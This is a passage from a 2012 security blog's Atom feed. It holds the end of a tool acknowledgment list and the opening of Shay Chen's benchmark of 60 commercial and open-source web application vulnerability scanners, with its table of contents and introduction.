advice and adjustments that made the creation of Diviner possible.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Liran Sheinbox (Developer) - Diviner&#39;s Payload Manager (alpha).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Alex Mor, &lt;a href=&quot;http://twitter.com/oren1ofer/&quot;&gt;Oren Ofer&lt;/a&gt; and Michal
Goldstein (Developers) - for their contribution to the development of Diviner&#39;s
content differentiation analysis features (alpha).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Alex Ganelis, Tsachi Itschak and Lior Suliman (Developers) - Diviner Installer,
ZAP Integration and various modifications.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Zafrir Grosman - material design.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The Flying Saucer Draught Emporium Bar at Houston, TX - for whatever substance
that triggered the inspiration.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7652889091954800711/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2012/07/the-diviner-clairvoyance-in-digital.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7652889091954800711'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7652889091954800711'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2012/07/the-diviner-clairvoyance-in-digital.html' title='The Diviner - Clairvoyance in the Digital Frontier'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95W_W2CLZ8FUA6qLUZqJ3BjHxHounKjFzaJ50YH3_H75eAzm8G20JDWznWRu4a-x2fa7MO-BVY_oQYbETBi1MpdOViS7l8BzOxKqLfeu_z2GsIvD8YK48Uot7TFkuw920VTs-FwmY0UA/s72-c/DivinerLogo.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-3552660977046894029</id><published>2012-07-13T09:24:00.000-07:00</published><updated>2012-07-30T15:30:10.463-07:00</updated><title type='text'>The 2012 Web Application Scanner Benchmark</title><content type='html'>&lt;br /&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 44pt; line-height: 115%;&quot;&gt;Top 10:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 44pt; line-height: 115%;&quot;&gt;The Web Application Vulnerability Scanners
Benchmark, 2012&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 30pt; line-height: 115%;&quot;&gt;Commercial &amp;amp; Open Source Scanners&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;
An &lt;b&gt;Accuracy&lt;/b&gt;, &lt;b&gt;Coverage&lt;/b&gt;,
&lt;b&gt;Versatility&lt;/b&gt;, &lt;b&gt;Adaptability&lt;/b&gt;,&lt;b&gt; Feature&lt;/b&gt; and &lt;b&gt;Price&lt;/b&gt; Comparison
of &lt;b&gt;&lt;span style=&quot;font-size: 14pt; line-height: 115%;&quot;&gt;60&lt;/span&gt;&lt;/b&gt; Commercial
&amp;amp; Open Source Black Box Web Application Vulnerability Scanners&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;By Shay Chen&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;Information Security Consultant, Researcher and
Instructor&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectooladdict.blogspot.com/&quot;&gt;http://sectooladdict.blogspot.com/&lt;/a&gt;,
&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;http://www.sectoolmarket.com/&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
sectooladdict-$at$-gmail-$dot$-com&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;July 2012&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;Assessment Environments:&lt;/i&gt;&lt;/b&gt; &lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;WAVSEP 1.2&lt;/a&gt;, ZAP-WAVE (WAVSEP
integration), &lt;a href=&quot;http://code.google.com/p/wivet/&quot;&gt;WIVET v3-rev148&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 16pt; line-height: 115%;&quot;&gt;Table of Contents&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;1.
Introduction&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;2.
List of Tested Web Application Scanners&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;3.
Benchmark Overview &amp;amp; Assessment Criteria&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;4.
A Glimpse at the Results of the Benchmark&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;5.
Test I - Scanner Versatility - Input Vector Support&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;6.
Test II – Attack Vector Support – Counting Audit Features&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;7.
Introduction to the Various Accuracy Assessments&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;8.
Test III – The Detection Accuracy of Reflected XSS&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;9.
Test IV – The Detection Accuracy of SQL Injection&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;10.
Test V – The Detection Accuracy of Path Traversal/LFI&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;11.
Test VI – The Detection Accuracy of RFI (XSS via RFI)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;12.
Test VII - WIVET - Coverage via Automated Crawling&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;13.
Test VIII – Scanner Adaptability - Crawling &amp;amp; Scan Barriers&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;14.
Test IX – Authentication and Usability Feature Comparison&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;15.
Test X – The Crown Jewel - Results &amp;amp; Features vs. Pricing&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;16.
Additional Comparisons, Built-in Products and Licenses&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;17.
What Changed?&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;18.
Initial Conclusions – Open Source vs. Commercial&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;19.
Verifying The Benchmark Results&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;20.
So What Now?&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;21.
Recommended Reading List: Scanner Benchmarks&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;22.
Thank-You Note&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;23.
FAQ - Why Didn&#39;t You Test NTO, Cenzic and N-Stalker?&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;&quot;&gt;24. Appendix A – List of Tools Not Included In the
Test&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;1. Introduction&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 159.6pt;&quot; valign=&quot;top&quot; width=&quot;213&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; text-align: center;&quot;&gt;
Detailed Result Presentation at&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;&lt;b&gt;http://www.sectoolmarket.com/&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; text-align: center;&quot;&gt;
Tools, Features, Results, Statistics
  and Price Comparison&lt;br /&gt;
(Delete Cache)&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 159.6pt;&quot; valign=&quot;top&quot; width=&quot;213&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; text-align: center;&quot;&gt;
A Step by Step Guide for Choosing the Right
  Web Application Vulnerability Scanner for *You*&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; text-align: center;&quot;&gt;
&lt;b&gt;&lt;a href=&quot;http://www.infosecisland.com/blogview/21926-A-Step-by-Step-Guide-for-Choosing-the-Best-Scanner.html&quot; target=&quot;_blank&quot;&gt;infosec-island&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 159.6pt;&quot; valign=&quot;top&quot; width=&quot;213&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; text-align: center;&quot;&gt;
A Perfectionist Guide for Optimal Use
  of Web Application Vulnerability Scanners&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; text-align: center;&quot;&gt;
&lt;b&gt;[Placeholder]&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Getting the information was the easy part. All I had to do
was to invest a couple of years in gathering the list of tools, and a couple of
more in documenting their various features. It&#39;s really a daily routine - you
read a couple of posts in news groups in the morning, and couple blogs at the
evening. Once you get used to it, it&#39;s fun, and even quite addictive.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Then came the &quot;&lt;b&gt;best&lt;/b&gt;&quot; fantasy, and with it,
the inclination to test the proclaimed features of all the &lt;b&gt;web application
vulnerability scanners&lt;/b&gt; against each other, only to find out that things are
not that simple, and finding the &quot;best&quot;, if there is such a tool, was
not an easy task.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Inevitably, I tried searching for alternative assessment
models, methods of measurements that will handle the imperfections of the
previous assessments.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I tried to change the perspective, add tests (and hundreds
of those - 940+, to be exact),&amp;nbsp; examine
different aspects, and even make parts of the test process obscure, and now,
I&#39;m finally ready for another shot.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In spite of everything I had invested in past researches, due
to the focus I had on features and accuracy, and the policy I used when
interacting with the various vendors, it was difficult, especially for me, to gain
insights from the mass amounts of data that will enable me to choose, and more
importantly, properly use the various tools in &lt;b&gt;&lt;u&gt;real life&lt;/u&gt;&lt;/b&gt;
scenarios.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Is the most accurate
scanner necessarily the best choice for a point and shoot scenario? and what
good will it do if it can&#39;t scan an application due to a specific scan barrier
it can&#39;t handle, or because if does not support the input delivery method? &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I needed to gather other pieces of the puzzle, and even more
importantly, I needed a method, or more accurately, a methodology.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I&#39;m sorry to disappoint you, dear reader, so early in the article,
but I still don&#39;t have a perfect answer or one recommendation... &lt;b&gt;But I sure
am much closer than I ever was&lt;/b&gt;, and although I might not have &lt;b&gt;the&lt;/b&gt;
answer, I have &lt;b&gt;many&lt;/b&gt; answers, and a very comprehensive, logical and clear
methodology for employing the use of all the information I&#39;m about to present.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In the previous benchmarks , I focused on assessing&amp;nbsp; &lt;b&gt;3&lt;/b&gt; major aspects of web application
scanners, which revolved mostly around features &amp;amp; accuracy, and even though
the information was very interesting, it wasn&#39;t necessarily useful, at least
not in all scenarios.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
So &lt;i&gt;&amp;nbsp;&lt;/i&gt;decided to
take it to the edge, but since I already reached the number of 60 scanners, it
was hard to make an impression with a couple of extra tools, so instead, I focused
my efforts on aspects.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
This time, I compared &lt;b&gt;10&lt;/b&gt; different aspects of the
tools (or 14, if you consider non competitive charts), and chose the collection
with the aim of providing practical tools for &lt;b&gt;making a decision&lt;/b&gt;, and getting
a glimpse of the bigger picture. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Let me &lt;b&gt;assure&lt;/b&gt; you - this time, the information is
presented in a manner that is &lt;b&gt;very helpful&lt;/b&gt;, is easy to navigate, and is supported
by presentation platforms, articles and step by step methodologies. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Furthermore, I wrapped it all in a summary that includes
the major results and features in relation to the &lt;u&gt;price&lt;/u&gt;, for those of us
that prefer the overview, and avoid the drill down.&amp;nbsp; Information and Insights that I believe, will
help testers invest their time in better-suited tools, and consumers in properly
investing their money, in the long term or the short term (but not necessarily
both*).&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
As mentioned earlier, this research covers various aspects
for the latest versions of &lt;b&gt;11&lt;/b&gt; commercial web application scanners, and the
latest versions of &lt;u&gt;most&lt;/u&gt; of the &lt;b&gt;49&lt;/b&gt; free &amp;amp; open source web
application scanners. It also covers some scanners that were &lt;b&gt;not&lt;/b&gt; covered
in previous benchmarks, and includes, among others, the following components
and tests:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;A Price Comparison&lt;/b&gt; - in Relation to the Rest of the Benchmark Results&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Scanner Versatility&lt;/b&gt; - A Measure for the Scanner&#39;s &amp;nbsp;Support of Protocols &amp;amp; Input Delivery Vectors&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Attack Vector Support&lt;/b&gt; - The Amount &amp;amp; Type of Active Scan Plugins (Vulnerability Detection)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Reflected Cross Site Scripting Detection Accuracy&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;SQL Injection Detection Accuracy&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Path Traversal / Local File Inclusion Detection Accuracy&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Remote File Inclusion Detection Accuracy&lt;/b&gt; (XSS/Phishing via RFI)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;WIVET Score Comparison&lt;/b&gt; - Automated Crawling / Input Vector Extraction&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Scanner Adaptability&lt;/b&gt; - Complementary Coverage Features and Scan Barrier Support&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Authentication Features Comparison&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;Complementary Scan Features and Embedded Products&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;General Scanning Features&lt;/b&gt; and Overall Impression&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
•&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&lt;b&gt;License Comparison and General Information&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
And just before we delve into the details, one last tip:
don&#39;t focus solely on the charts - if you want to really understand what they
reflect, dig in.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Lists and charts first, detailed description later. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;2. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;List of Tested Web Application
Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;u&gt;The following &lt;b&gt;commercial&lt;/b&gt; scanners were &lt;b&gt;included&lt;/b&gt;
in the benchmark:&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l3 level1 lfo2; text-indent: -18.0pt;&quot;&gt;
&lt;ul&gt;
